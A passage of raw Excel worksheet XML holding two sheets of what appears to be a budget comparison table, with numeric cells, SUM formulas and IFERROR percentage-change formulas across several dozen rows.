        <v>-144.120654396728</v>
      </c>
    </row>
    <row r="15" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A15" s="768" t="s">
        <v>840</v>
      </c>
      <c r="B15" s="767">
        <v>2267</v>
      </c>
      <c r="C15" s="767">
        <v>2373</v>
      </c>
      <c r="D15" s="733">
        <f t="shared" si="0"/>
        <v>4.67578297309219</v>
      </c>
    </row>
    <row r="16" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A16" s="768" t="s">
        <v>841</v>
      </c>
      <c r="B16" s="767">
        <v>2991</v>
      </c>
      <c r="C16" s="767">
        <v>3165</v>
      </c>
      <c r="D16" s="733">
        <f t="shared" si="0"/>
        <v>5.81745235707121</v>
      </c>
    </row>
    <row r="17" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A17" s="768" t="s">
        <v>842</v>
      </c>
      <c r="B17" s="767">
        <v>8509</v>
      </c>
      <c r="C17" s="767">
        <v>8507</v>
      </c>
      <c r="D17" s="733">
        <f t="shared" si="0"/>
        <v>-0.0235045246209895</v>
      </c>
    </row>
    <row r="18" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A18" s="769" t="s">
        <v>843</v>
      </c>
      <c r="B18" s="767">
        <v>4</v>
      </c>
      <c r="C18" s="767">
        <v>179</v>
      </c>
      <c r="D18" s="733">
        <f t="shared" si="0"/>
        <v>4375</v>
      </c>
    </row>
    <row r="19" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A19" s="768" t="s">
        <v>844</v>
      </c>
      <c r="B19" s="767">
        <v>289</v>
      </c>
      <c r="C19" s="767">
        <v>311</v>
      </c>
      <c r="D19" s="733">
        <f t="shared" si="0"/>
        <v>7.61245674740484</v>
      </c>
    </row>
    <row r="20" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A20" s="768" t="s">
        <v>845</v>
      </c>
      <c r="B20" s="767"/>
      <c r="C20" s="767"/>
      <c r="D20" s="733"/>
    </row>
    <row r="21" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A21" s="766" t="s">
        <v>846</v>
      </c>
      <c r="B21" s="770">
        <f>SUM(B22:B28)</f>
        <v>124761</v>
      </c>
      <c r="C21" s="770">
        <f>SUM(C22:C28)</f>
        <v>123264</v>
      </c>
      <c r="D21" s="733">
        <f t="shared" ref="D19:D24" si="1">IFERROR((C21-B21)/B21*100,"-")</f>
        <v>-1.19989419770601</v>
      </c>
    </row>
    <row r="22" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A22" s="768" t="s">
        <v>847</v>
      </c>
      <c r="B22" s="771">
        <v>6254</v>
      </c>
      <c r="C22" s="770">
        <v>6601</v>
      </c>
      <c r="D22" s="733">
        <f t="shared" si="1"/>
        <v>5.54844899264471</v>
      </c>
    </row>
    <row r="23" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A23" s="768" t="s">
        <v>848</v>
      </c>
      <c r="B23" s="771">
        <v>6400</v>
      </c>
      <c r="C23" s="770">
        <v>6778</v>
      </c>
      <c r="D23" s="733">
        <f t="shared" si="1"/>
        <v>5.90625</v>
      </c>
    </row>
    <row r="24" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A24" s="768" t="s">
        <v>849</v>
      </c>
      <c r="B24" s="771">
        <v>12690</v>
      </c>
      <c r="C24" s="770">
        <v>10300</v>
      </c>
      <c r="D24" s="733">
        <f t="shared" si="1"/>
        <v>-18.8337273443656</v>
      </c>
    </row>
    <row r="25" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A25" s="768" t="s">
        <v>850</v>
      </c>
      <c r="B25" s="771"/>
      <c r="C25" s="770"/>
      <c r="D25" s="733"/>
    </row>
    <row r="26" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A26" s="768" t="s">
        <v>943</v>
      </c>
      <c r="B26" s="771">
        <v>98884</v>
      </c>
      <c r="C26" s="770">
        <v>99020</v>
      </c>
      <c r="D26" s="733">
        <f t="shared" ref="D26:D30" si="2">IFERROR((C26-B26)/B26*100,"-")</f>
        <v>0.137534889365317</v>
      </c>
    </row>
    <row r="27" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A27" s="768" t="s">
        <v>852</v>
      </c>
      <c r="B27" s="771">
        <v>109</v>
      </c>
      <c r="C27" s="567">
        <v>116</v>
      </c>
      <c r="D27" s="733">
        <f t="shared" si="2"/>
        <v>6.42201834862385</v>
      </c>
    </row>
    <row r="28" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A28" s="768" t="s">
        <v>508</v>
      </c>
      <c r="B28" s="771">
        <v>424</v>
      </c>
      <c r="C28" s="770">
        <v>449</v>
      </c>
      <c r="D28" s="733">
        <f t="shared" si="2"/>
        <v>5.89622641509434</v>
      </c>
    </row>
    <row r="29" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A29" s="772" t="s">
        <v>944</v>
      </c>
      <c r="B29" s="773">
        <f>SUM(B5,B21)</f>
        <v>216362</v>
      </c>
      <c r="C29" s="773">
        <f>SUM(C5,C21)</f>
        <v>220564</v>
      </c>
      <c r="D29" s="737">
        <f t="shared" si="2"/>
        <v>1.94211552860484</v>
      </c>
    </row>
    <row r="30" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A30" s="774" t="s">
        <v>406</v>
      </c>
      <c r="B30" s="775">
        <f>B31+B32</f>
        <v>7140</v>
      </c>
      <c r="C30" s="776">
        <f>SUM(C31:C32)</f>
        <v>23976</v>
      </c>
      <c r="D30" s="777">
        <f t="shared" si="2"/>
        <v>235.798319327731</v>
      </c>
    </row>
    <row r="31" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A31" s="774" t="s">
        <v>664</v>
      </c>
      <c r="B31" s="775"/>
      <c r="C31" s="776"/>
      <c r="D31" s="777"/>
    </row>
    <row r="32" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A32" s="778" t="s">
        <v>665</v>
      </c>
      <c r="B32" s="775">
        <v>7140</v>
      </c>
      <c r="C32" s="776">
        <v>23976</v>
      </c>
      <c r="D32" s="777">
        <f t="shared" ref="D32:D42" si="3">IFERROR((C32-B32)/B32*100,"-")</f>
        <v>235.798319327731</v>
      </c>
    </row>
    <row r="33" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A33" s="774" t="s">
        <v>409</v>
      </c>
      <c r="B33" s="775">
        <f>B34+B35+B36+B37+B38+B39+B40+B41</f>
        <v>318243</v>
      </c>
      <c r="C33" s="779">
        <f>SUM(C34:C41)</f>
        <v>296594</v>
      </c>
      <c r="D33" s="777">
        <f t="shared" si="3"/>
        <v>-6.80266337358559</v>
      </c>
    </row>
    <row r="34" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A34" s="774" t="s">
        <v>666</v>
      </c>
      <c r="B34" s="775">
        <v>12077</v>
      </c>
      <c r="C34" s="776">
        <v>12077</v>
      </c>
      <c r="D34" s="777">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A35" s="774" t="s">
        <v>667</v>
      </c>
      <c r="B35" s="775">
        <v>181087</v>
      </c>
      <c r="C35" s="776">
        <v>160000</v>
      </c>
      <c r="D35" s="777">
        <f t="shared" si="3"/>
        <v>-11.6446790769078</v>
      </c>
    </row>
    <row r="36" s="755" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A36" s="774" t="s">
        <v>668</v>
      </c>
      <c r="B36" s="775">
        <v>35115</v>
      </c>
      <c r="C36" s="776">
        <v>29000</v>
      </c>
      <c r="D36" s="777">
        <f t="shared" si="3"/>
        <v>-17.4142104513741</v>
      </c>
    </row>
    <row r="37" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A37" s="778" t="s">
        <v>669</v>
      </c>
      <c r="B37" s="775">
        <v>25874</v>
      </c>
      <c r="C37" s="776">
        <v>26000</v>
      </c>
      <c r="D37" s="777">
        <f t="shared" si="3"/>
        <v>0.486975342042205</v>
      </c>
    </row>
    <row r="38" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A38" s="774" t="s">
        <v>670</v>
      </c>
      <c r="B38" s="775">
        <v>5489</v>
      </c>
      <c r="C38" s="776"/>
      <c r="D38" s="777">
        <f t="shared" si="3"/>
        <v>-100</v>
      </c>
    </row>
    <row r="39" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A39" s="774" t="s">
        <v>671</v>
      </c>
      <c r="B39" s="775">
        <v>50567</v>
      </c>
      <c r="C39" s="776">
        <v>63525</v>
      </c>
      <c r="D39" s="777">
        <f t="shared" si="3"/>
        <v>25.6254078747009</v>
      </c>
    </row>
    <row r="40" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A40" s="774" t="s">
        <v>672</v>
      </c>
      <c r="B40" s="775">
        <v>8034</v>
      </c>
      <c r="C40" s="776">
        <v>5992</v>
      </c>
      <c r="D40" s="777">
        <f t="shared" si="3"/>
        <v>-25.4169778441623</v>
      </c>
    </row>
    <row r="41" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A41" s="774" t="s">
        <v>673</v>
      </c>
      <c r="B41" s="775"/>
      <c r="C41" s="776"/>
      <c r="D41" s="777"/>
    </row>
    <row r="42" s="754" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A42" s="780" t="s">
        <v>417</v>
      </c>
      <c r="B42" s="781">
        <f>B29+B30+B33</f>
        <v>541745</v>
      </c>
      <c r="C42" s="781">
        <f>C29+C30+C33</f>
        <v>541134</v>
      </c>
      <c r="D42" s="782">
        <f t="shared" si="3"/>
        <v>-0.112783689743329</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:D2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.590277777777778" right="0.590277777777778" top="0.790972222222222" bottom="0.790972222222222" header="0.310416666666667" footer="0.310416666666667"/>
  <pageSetup paperSize="9" scale="88" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet4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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:D290"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B26" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A5" sqref="A5:A40"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="21" customHeight="1" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="40.2777777777778" style="719" customWidth="1"/>
    <col min="2" max="3" width="16.7222222222222" style="720" customWidth="1"/>
    <col min="4" max="4" width="14.2777777777778" style="720" customWidth="1"/>
    <col min="5" max="16384" width="10.2777777777778" style="719"/>
  </cols>
  <sheetData>
    <row r="1" ht="24" customHeight="1" spans="1:4">
      <c r="A1" s="334" t="s">
        <v>945</v>
      </c>
      <c r="B1" s="721"/>
      <c r="C1" s="721"/>
      <c r="D1" s="721"/>
    </row>
    <row r="2" ht="36.95" customHeight="1" spans="1:4">
      <c r="A2" s="722" t="s">
        <v>946</v>
      </c>
      <c r="B2" s="722"/>
      <c r="C2" s="722"/>
      <c r="D2" s="722"/>
    </row>
    <row r="3" s="712" customFormat="1" ht="19.5" customHeight="1" spans="1:4">
      <c r="A3" s="723"/>
      <c r="B3" s="724" t="s">
        <v>373</v>
      </c>
      <c r="C3" s="725"/>
      <c r="D3" s="725"/>
    </row>
    <row r="4" s="713" customFormat="1" ht="30" customHeight="1" spans="1:4">
      <c r="A4" s="726" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="727" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="728" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="729" t="s">
        <v>917</v>
      </c>
    </row>
    <row r="5" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A5" s="730" t="s">
        <v>676</v>
      </c>
      <c r="B5" s="731">
        <v>30219</v>
      </c>
      <c r="C5" s="732">
        <v>33072</v>
      </c>
      <c r="D5" s="733">
        <f>IFERROR((C5-B5)/B5*100,"-")</f>
        <v>9.44108011515934</v>
      </c>
    </row>
    <row r="6" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A6" s="730" t="s">
        <v>677</v>
      </c>
      <c r="B6" s="731"/>
      <c r="C6" s="732">
        <v>0</v>
      </c>
      <c r="D6" s="733"/>
    </row>
    <row r="7" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A7" s="730" t="s">
        <v>678</v>
      </c>
      <c r="B7" s="731">
        <v>341</v>
      </c>
      <c r="C7" s="732">
        <v>340</v>
      </c>
      <c r="D7" s="733">
        <f t="shared" ref="D7:D38" si="0">IFERROR((C7-B7)/B7*100,"-")</f>
        <v>-0.293255131964809</v>
      </c>
    </row>
    <row r="8" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A8" s="730" t="s">
        <v>679</v>
      </c>
      <c r="B8" s="731">
        <v>17469</v>
      </c>
      <c r="C8" s="732">
        <v>16959</v>
      </c>
      <c r="D8" s="733">
        <f t="shared" si="0"/>
        <v>-2.91945732440323</v>
      </c>
    </row>
    <row r="9" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A9" s="730" t="s">
        <v>680</v>
      </c>
      <c r="B9" s="731">
        <v>117300</v>
      </c>
      <c r="C9" s="732">
        <v>117310</v>
      </c>
      <c r="D9" s="733">
        <f t="shared" si="0"/>
        <v>0.00852514919011083</v>
      </c>
    </row>
    <row r="10" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A10" s="730" t="s">
        <v>681</v>
      </c>
      <c r="B10" s="731">
        <v>884</v>
      </c>
      <c r="C10" s="732">
        <v>871</v>
      </c>
      <c r="D10" s="733">
        <f t="shared" si="0"/>
        <v>-1.47058823529412</v>
      </c>
    </row>
    <row r="11" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A11" s="730" t="s">
        <v>682</v>
      </c>
      <c r="B11" s="731">
        <v>3149</v>
      </c>
      <c r="C11" s="732">
        <v>2957</v>
      </c>
      <c r="D11" s="733">
        <f t="shared" si="0"/>
        <v>-6.09717370593839</v>
      </c>
    </row>
    <row r="12" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A12" s="730" t="s">
        <v>683</v>
      </c>
      <c r="B12" s="731">
        <v>106800</v>
      </c>
      <c r="C12" s="732">
        <v>107482</v>
      </c>
      <c r="D12" s="733">
        <f t="shared" si="0"/>
        <v>0.638576779026217</v>
      </c>
    </row>
    <row r="13" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A13" s="730" t="s">
        <v>684</v>
      </c>
      <c r="B13" s="731">
        <v>41776</v>
      </c>
      <c r="C13" s="732">
        <v>41556</v>
      </c>
      <c r="D13" s="733">
        <f t="shared" si="0"/>
        <v>-0.526618153963998</v>
      </c>
    </row>
    <row r="14" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A14" s="730" t="s">
        <v>685</v>
      </c>
      <c r="B14" s="731">
        <v>3373</v>
      </c>
      <c r="C14" s="732">
        <v>3075</v>
      </c>
      <c r="D14" s="733">
        <f t="shared" si="0"/>
        <v>-8.83486510524755</v>
      </c>
    </row>
    <row r="15" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A15" s="730" t="s">
        <v>686</v>
      </c>
      <c r="B15" s="731">
        <v>39983</v>
      </c>
      <c r="C15" s="732">
        <v>25816</v>
      </c>
      <c r="D15" s="733">
        <f t="shared" si="0"/>
        <v>-35.4325588375059</v>
      </c>
    </row>
    <row r="16" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A16" s="730" t="s">
        <v>687</v>
      </c>
      <c r="B16" s="731">
        <v>30158</v>
      </c>
      <c r="C16" s="732">
        <v>28273</v>
      </c>
      <c r="D16" s="733">
        <f t="shared" si="0"/>
        <v>-6.25041448371908</v>
      </c>
    </row>
    <row r="17" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A17" s="730" t="s">
        <v>688</v>
      </c>
      <c r="B17" s="731">
        <v>5664</v>
      </c>
      <c r="C17" s="732">
        <v>5509</v>
      </c>
      <c r="D17" s="733">
        <f t="shared" si="0"/>
        <v>-2.73658192090395</v>
      </c>
    </row>
    <row r="18" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A18" s="730" t="s">
        <v>689</v>
      </c>
      <c r="B18" s="731">
        <v>2230</v>
      </c>
      <c r="C18" s="732">
        <v>1462</v>
      </c>
      <c r="D18" s="733">
        <f t="shared" si="0"/>
        <v>-34.4394618834081</v>
      </c>
    </row>
    <row r="19" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A19" s="730" t="s">
        <v>690</v>
      </c>
      <c r="B19" s="731">
        <v>1163</v>
      </c>
      <c r="C19" s="732">
        <v>1064</v>
      </c>
      <c r="D19" s="733">
        <f t="shared" si="0"/>
        <v>-8.51246775580396</v>
      </c>
    </row>
    <row r="20" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A20" s="730" t="s">
        <v>691</v>
      </c>
      <c r="B20" s="731">
        <v>165</v>
      </c>
      <c r="C20" s="732">
        <v>71</v>
      </c>
      <c r="D20" s="733">
        <f t="shared" si="0"/>
        <v>-56.969696969697</v>
      </c>
    </row>
    <row r="21" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A21" s="730" t="s">
        <v>692</v>
      </c>
      <c r="B21" s="731">
        <v>932</v>
      </c>
      <c r="C21" s="732">
        <v>941</v>
      </c>
      <c r="D21" s="733">
        <f t="shared" si="0"/>
        <v>0.965665236051502</v>
      </c>
    </row>
    <row r="22" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A22" s="730" t="s">
        <v>693</v>
      </c>
      <c r="B22" s="731">
        <v>4659</v>
      </c>
      <c r="C22" s="732">
        <v>4624</v>
      </c>
      <c r="D22" s="733">
        <f t="shared" si="0"/>
        <v>-0.751234170422837</v>
      </c>
    </row>
    <row r="23" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A23" s="730" t="s">
        <v>694</v>
      </c>
      <c r="B23" s="731">
        <v>9999</v>
      </c>
      <c r="C23" s="732">
        <v>8909</v>
      </c>
      <c r="D23" s="733">
        <f t="shared" si="0"/>
        <v>-10.9010901090109</v>
      </c>
    </row>
    <row r="24" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A24" s="730" t="s">
        <v>695</v>
      </c>
      <c r="B24" s="731">
        <v>182</v>
      </c>
      <c r="C24" s="732">
        <v>185</v>
      </c>
      <c r="D24" s="733">
        <f t="shared" si="0"/>
        <v>1.64835164835165</v>
      </c>
    </row>
    <row r="25" s="715" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A25" s="730" t="s">
        <v>696</v>
      </c>
      <c r="B25" s="731">
        <v>3529</v>
      </c>
      <c r="C25" s="732">
        <v>3339</v>
      </c>
      <c r="D25" s="733">
        <f t="shared" si="0"/>
        <v>-5.38396146217059</v>
      </c>
    </row>
    <row r="26" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A26" s="734" t="s">
        <v>865</v>
      </c>
      <c r="B26" s="731"/>
      <c r="C26" s="732">
        <v>4510</v>
      </c>
      <c r="D26" s="733"/>
    </row>
    <row r="27" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A27" s="734" t="s">
        <v>866</v>
      </c>
      <c r="B27" s="731">
        <v>4467</v>
      </c>
      <c r="C27" s="732">
        <v>4452</v>
      </c>
      <c r="D27" s="733">
        <f t="shared" si="0"/>
        <v>-0.335795836131632</v>
      </c>
    </row>
    <row r="28" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A28" s="734" t="s">
        <v>867</v>
      </c>
      <c r="B28" s="731"/>
      <c r="C28" s="732">
        <v>0</v>
      </c>
      <c r="D28" s="733"/>
    </row>
    <row r="29" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A29" s="734" t="s">
        <v>868</v>
      </c>
      <c r="B29" s="731">
        <v>6302</v>
      </c>
      <c r="C29" s="732">
        <v>5391</v>
      </c>
      <c r="D29" s="733">
        <f t="shared" si="0"/>
        <v>-14.4557283402095</v>
      </c>
    </row>
    <row r="30" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A30" s="735" t="s">
        <v>947</v>
      </c>
      <c r="B30" s="736">
        <f>SUM(B5:B29)</f>
        <v>430744</v>
      </c>
      <c r="C30" s="736">
        <f>SUM(C5:C29)</f>
        <v>418168</v>
      </c>
      <c r="D30" s="737">
        <f t="shared" si="0"/>
        <v>-2.91959957654663</v>
      </c>
    </row>
    <row r="31" s="716" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A31" s="738" t="s">
        <v>870</v>
      </c>
      <c r="B31" s="739">
        <f>B32+B33</f>
        <v>7729</v>
      </c>
      <c r="C31" s="739">
        <f>C32+C33</f>
        <v>26640</v>
      </c>
      <c r="D31" s="740">
        <f t="shared" si="0"/>
        <v>244.675895976194</v>
      </c>
    </row>
    <row r="32" s="716" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A32" s="741" t="s">
        <v>871</v>
      </c>
      <c r="B32" s="739">
        <v>589</v>
      </c>
      <c r="C32" s="696">
        <v>2664</v>
      </c>
      <c r="D32" s="740">
        <f t="shared" si="0"/>
        <v>352.292020373514</v>
      </c>
    </row>
    <row r="33" s="716" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A33" s="741" t="s">
        <v>872</v>
      </c>
      <c r="B33" s="739">
        <v>7140</v>
      </c>
      <c r="C33" s="696">
        <v>23976</v>
      </c>
      <c r="D33" s="740">
        <f t="shared" si="0"/>
        <v>235.798319327731</v>
      </c>
    </row>
    <row r="34" s="716" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A34" s="742" t="s">
        <v>778</v>
      </c>
      <c r="B34" s="743">
        <f>B35+B36+B37+B38+B39+B40</f>
        <v>103272</v>
      </c>
      <c r="C34" s="744">
        <f>SUM(C35:C40)</f>
        <v>96326</v>
      </c>
      <c r="D34" s="740">
        <f t="shared" si="0"/>
        <v>-6.7259276473778</v>
      </c>
    </row>
    <row r="35" s="716" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A35" s="741" t="s">
        <v>511</v>
      </c>
      <c r="B35" s="739"/>
      <c r="C35" s="696"/>
      <c r="D35" s="740"/>
    </row>
    <row r="36" s="716" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A36" s="741" t="s">
        <v>948</v>
      </c>
      <c r="B36" s="739">
        <v>77620</v>
      </c>
      <c r="C36" s="651">
        <v>81000</v>
      </c>
      <c r="D36" s="740">
        <f t="shared" ref="D36:D38" si="1">IFERROR((C36-B36)/B36*100,"-")</f>
        <v>4.35454779695955</v>
      </c>
    </row>
    <row r="37" s="717" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A37" s="741" t="s">
        <v>700</v>
      </c>
      <c r="B37" s="743">
        <v>19660</v>
      </c>
      <c r="C37" s="745">
        <v>15326</v>
      </c>
      <c r="D37" s="740">
        <f t="shared" si="1"/>
        <v>-22.0447609359105</v>
      </c>
    </row>
    <row r="38" s="717" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A38" s="741" t="s">
        <v>875</v>
      </c>
      <c r="B38" s="739"/>
      <c r="C38" s="651"/>
      <c r="D38" s="740"/>
    </row>
    <row r="39" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A39" s="741" t="s">
        <v>876</v>
      </c>
      <c r="B39" s="739"/>
      <c r="C39" s="651"/>
      <c r="D39" s="740"/>
    </row>
    <row r="40" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A40" s="741" t="s">
        <v>949</v>
      </c>
      <c r="B40" s="739">
        <v>5992</v>
      </c>
      <c r="C40" s="651"/>
      <c r="D40" s="740">
        <f>IFERROR((C40-B40)/B40*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="41" s="714" customFormat="1" ht="18" customHeight="1" spans="1:4">
      <c r="A41" s="746" t="s">
        <v>783</v>
      </c>
      <c r="B41" s="747">
        <f>B30+B31+B34</f>
        <v>541745</v>
      </c>
      <c r="C41" s="748">
        <f>C30+C31+C34</f>
        <v>541134</v>
      </c>
      <c r="D41" s="749">
        <f>IFERROR((C41-B41)/B41*100,"-")</f>
        <v>-0.112783689743329</v>
      </c>
    </row>
    <row r="42" s="714" customFormat="1" ht="20.1" customHeight="1" spans="2:4">
      <c r="B42" s="750"/>
      <c r="C42" s="750"/>
      <c r="D42" s="750"/>
    </row>
    <row r="43" s="718" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A43" s="714"/>
      <c r="B43" s="750"/>
      <c r="C43" s="750"/>
      <c r="D43" s="750"/>
    </row>
    <row r="44" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B44" s="750"/>
      <c r="C44" s="750"/>
      <c r="D44" s="750"/>
    </row>
    <row r="45" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B45" s="750"/>
      <c r="C45" s="750"/>
      <c r="D45" s="750"/>
    </row>
    <row r="46" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B46" s="750"/>
      <c r="C46" s="750"/>
      <c r="D46" s="750"/>
    </row>
    <row r="47" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B47" s="750"/>
      <c r="C47" s="750"/>
      <c r="D47" s="750"/>
    </row>
    <row r="48" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B48" s="750"/>
      <c r="C48" s="750"/>
      <c r="D48" s="750"/>
    </row>
    <row r="49" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B49" s="750"/>
      <c r="C49" s="750"/>
      <c r="D49" s="750"/>
    </row>
    <row r="50" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B50" s="750"/>
      <c r="C50" s="750"/>
      <c r="D50" s="750"/>
    </row>
    <row r="51" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B51" s="750"/>
      <c r="C51" s="750"/>
      <c r="D51" s="750"/>
    </row>
    <row r="52" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B52" s="750"/>
      <c r="C52" s="750"/>
      <c r="D52" s="750"/>
    </row>
    <row r="53" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B53" s="750"/>
      <c r="C53" s="750"/>
      <c r="D53" s="750"/>
    </row>
    <row r="54" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B54" s="750"/>
      <c r="C54" s="750"/>
      <c r="D54" s="750"/>
    </row>
    <row r="55" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B55" s="750"/>
      <c r="C55" s="750"/>
      <c r="D55" s="750"/>
    </row>
    <row r="56" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B56" s="750"/>
      <c r="C56" s="750"/>
      <c r="D56" s="750"/>
    </row>
    <row r="57" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B57" s="750"/>
      <c r="C57" s="750"/>
      <c r="D57" s="750"/>
    </row>
    <row r="58" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B58" s="750"/>
      <c r="C58" s="750"/>
      <c r="D58" s="750"/>
    </row>
    <row r="59" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B59" s="750"/>
      <c r="C59" s="750"/>
      <c r="D59" s="750"/>
    </row>
    <row r="60" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B60" s="750"/>
      <c r="C60" s="750"/>
      <c r="D60" s="750"/>
    </row>
    <row r="61" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B61" s="750"/>
      <c r="C61" s="750"/>
      <c r="D61" s="750"/>
    </row>
    <row r="62" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B62" s="750"/>
      <c r="C62" s="750"/>
      <c r="D62" s="750"/>
    </row>
    <row r="63" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B63" s="750"/>
      <c r="C63" s="750"/>
      <c r="D63" s="750"/>
    </row>
    <row r="64" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B64" s="750"/>
      <c r="C64" s="750"/>
      <c r="D64" s="750"/>
    </row>
    <row r="65" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B65" s="750"/>
      <c r="C65" s="750"/>
      <c r="D65" s="750"/>
    </row>
    <row r="66" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B66" s="750"/>
      <c r="C66" s="750"/>
      <c r="D66" s="750"/>
    </row>
    <row r="67" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B67" s="750"/>
      <c r="C67" s="750"/>
      <c r="D67" s="750"/>
    </row>
    <row r="68" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B68" s="750"/>
      <c r="C68" s="750"/>
      <c r="D68" s="750"/>
    </row>
